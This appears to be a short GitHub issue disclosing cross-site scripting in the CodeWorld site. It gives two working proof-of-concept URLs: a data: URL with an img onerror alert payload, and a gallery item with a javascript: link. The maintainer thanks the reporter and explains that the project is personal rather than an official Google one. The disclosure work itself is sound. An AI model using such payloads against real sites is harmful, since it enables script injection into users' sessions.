XSS

[NDevTK]

It seems normally code is run in a sandboxed iframe #1193 but you can still get XSS via a link.

https://code.world/doc.html?path=data:text/html,%3Cimg%20src%20onerror=%22alert(window.origin)%22%3E%3C/img%3E

https://code.world/gallery.html?path=data:text/html,%7B%22items%22:%5B%7B%22name%22:%22Click%20me%22,%22url%22:%22javascript:alert(window.origin)%22%7D%5D%7D (Needs click but no embed protection)

Im not sure whats considered a risk maybe this is allowed also the security policy for this repo is https://github.com/google/codeworld/security/policy and google probably wont respond to reported issues.

[cdsmith]

To clarify, CodeWorld is my personal project. In the past, I was a Google employee, and because of internal company process, it was easier to release it on Google's GitHub account. This isn't an official Google project, though.

Thanks for the bug report.